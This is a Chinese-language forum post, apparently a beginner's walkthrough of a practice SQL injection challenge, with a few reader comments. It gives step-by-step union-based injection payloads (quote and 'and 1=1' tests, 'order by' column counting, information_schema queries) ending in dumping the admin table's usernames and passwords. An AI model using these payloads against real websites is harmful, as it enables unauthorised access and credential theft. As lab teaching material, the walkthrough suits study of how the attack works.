咳咳,开始正文,,刚开始我初次接触web安全,一开始做这道题, 难死我了,,啥都不会,啥都不懂,。跟着视频慢慢走,模仿做,刚开始我是放弃了,应为手工注入那一行行语法,压根看不懂。时间久了。我再次来使。我已经有了一定的基础。
那么进入正题
第一步:
看网站是否存在sql注入漏洞 咳咳,,这不是废话,,题目肯定存在呀。。!!
判断注入漏洞
1、 在id=1 后面加一个’ 然后页面回显错误 存在注入漏洞
2、 在id=1 后面输入 and 1 = 1 回显正常 and 1=2回显错误 存在注入漏洞 (凑合看,图片顺序好像是倒着放的)
然后现在已经确定,存在注入漏洞 !!
sql注入漏洞 顺序
1、判断是否存在注入漏洞 用 ’ and 1=1 and 1=2 进行判断
2、猜字段 order by 1,2,3... 知道页面出错 然后判断 出错之前的那个数 可以判断出字段 这里出错的是3 可以判断它只有2个字段,利用哪一个都可以
3、爆表名 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
讲一下, 这里爆表名 的意思是只 数据库里面有多少个表,全给它显示出来 数据库分为 表 表里面存着admin password 的表
意思就是,你有一本书,书里面你夹了1000块钱 这个是有个叫admin 的表,, 这个表里面存放着用户的账号和密码 。
这个数据库一共有4个表 admin,dirs,news,xss 一般来说我们只是获取后台的账号和密码 admin 里肯定存放着!
4、爆字段名 通俗点就是,, 爆表里面的内容!!
and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
咳咳 又到了讲解时刻, 我们已经成功得到了admin表里面的内容,离我们获取账号和密码不远了, and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='这里面写的是要查看的表名'#
5、 爆内容。 哈哈总算是要爆内容了,,这个网站账号密码要让我猜出来了 哈哈哈哈
老规矩 id=1 后面写
and 1=2 union select 1,group_concat(username,password) from admin#
讲一下,, 这段的意思是, 联合查询, 查 username password 内容 从 一个叫admin的表里面查询。
and 1=2 union select 1,group_concat(这里写要查的字段名记得用,逗号隔开 切记英文) from admin#
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
我想成为骑猪的人
发表于 2019-4-12
感谢大佬.不然按照原本的解题思路,有的地方参数写进去网页没回显.现在看大佬的帖子就知道了用这些参数就可以进行把所有的表名,字段名,账号密码全部爆出来
评论列表
加载数据中...
冰封小天堂
发表于 2019-4-21
大佬,为什么每次都要加上and=2啊??
评论列表
加载数据中...
detached
发表于 2019-4-26
评论列表
加载数据中...